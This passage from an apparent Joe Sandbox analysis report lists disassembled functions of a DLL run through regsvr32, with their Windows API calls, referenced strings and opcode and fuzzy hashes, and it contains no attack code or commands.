                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
                                                                                                          • Instruction ID: 0d7c4b7ad1d73a1697217a780c63f05e975ccc5f711293de909a3a3b9b9d2103
                                                                                                          • Opcode Fuzzy Hash: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
                                                                                                          • Instruction Fuzzy Hash: 16F0A431600109ABDF11DF60DD88A9E7FB8FF05346F908021FC1AC5061DB32CA55EB99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3
                                                                                                          • String ID:
                                                                                                          • API String ID: 431132790-0
                                                                                                          • Opcode ID: 1217f1ca601d0389ec3f5c1c288cc429db0f350fe1057340691c20e11584fb44
                                                                                                          • Instruction ID: 7aa724dcfe317f1d1dbd5d4486dba1b6deee93e66c4b17b022368e02ca0af700
                                                                                                          • Opcode Fuzzy Hash: 1217f1ca601d0389ec3f5c1c288cc429db0f350fe1057340691c20e11584fb44
                                                                                                          • Instruction Fuzzy Hash: AAF18F74600219EFDF15CF54E880EAE7BE9FF08390F918559F8199B292DB34EA11DB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: recvfrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 846543921-0
                                                                                                          • Opcode ID: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
                                                                                                          • Instruction ID: 69fb0fddd724ab168ece224e86e76236123086ad7b1ad86b3e1ae6067053412b
                                                                                                          • Opcode Fuzzy Hash: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
                                                                                                          • Instruction Fuzzy Hash: 1B0125B5A0011C9FDB14CF58CD54BEEBBB9FF88304F4045A9E609A7241D7B46A84CFA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                          • Instruction ID: e461c5ceb4082b2a3bfba79310045b5265001ed38dfd5d36d50f4efd431a1f71
                                                                                                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                          • Instruction Fuzzy Hash: 7BD16273C0A5F30A87B6C52D516823EEEA2AFC26D136BC7F59CE02F28A91275D1095D0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                          • Instruction ID: e099078e729fc0aa79c9c736f0f3383331c6c98ba1816dfa590606459c4e72e6
                                                                                                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                          • Instruction Fuzzy Hash: 6FD14F73C0A9F30A83B5C52D616823AEEA2AFC16D036BC7F59CE43F289D6275D0495D0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                          • Instruction ID: 0249e3902306f3ab000ed27b9437b08394f89c485674606c9f26e524861a3e45
                                                                                                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                          • Instruction Fuzzy Hash: C0C15073C0A9F30A83B5C52D615823AEEA2AFC16D136BC7F5DCE43F28992276D0595D0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                                                                                                          • EnumResourceLanguagesA.KERNEL32 ref: 100215EA
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          • _memset.LIBCMT ref: 10021689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                          • API String ID: 3537336938-2299501126
                                                                                                          • Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
                                                                                                          • Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                                                                                                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                                                                                                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034656
                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034666
                                                                                                          • __lock.LIBCMT ref: 10034688
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                                                                                                          • __lock.LIBCMT ref: 100346A9
                                                                                                          • ___addlocaleref.LIBCMT ref: 100346C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                          • API String ID: 1028249917-2843748187
                                                                                                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                                                                                                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                          • API String ID: 667068680-3617302793
                                                                                                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                                                                                                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043A6C
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
                                                                                                          • int.LIBCPMT ref: 10043A8D
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043A96
                                                                                                          • ctype.LIBCPMT ref: 10043AB0
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043AD2
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 2535038987-3145022300
                                                                                                          • Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
                                                                                                          • Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                                                                                                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                                                                                                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                                                                                                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,2B815A64), ref: 1002346F
                                                                                                          • GetDesktopWindow.USER32 ref: 100234A2
                                                                                                          • IsWindowEnabled.USER32(?), ref: 100234B0
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                                                                                                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,2B815A64), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,2B815A64), ref: 100235D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 964565984-0
                                                                                                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                                                                                                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                                                                                                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                                                                                                          • GetDC.USER32(00000000), ref: 1002B9EC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                                                                                                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                                                                                                          • ReleaseDC.USER32 ref: 1002BA18
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                          • String ID: System
                                                                                                          • API String ID: 46613423-3470857405
                                                                                                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                                                                                                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3697954797-0
                                                                                                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                                                                                                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10001982
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                                                                                                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002104C
                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
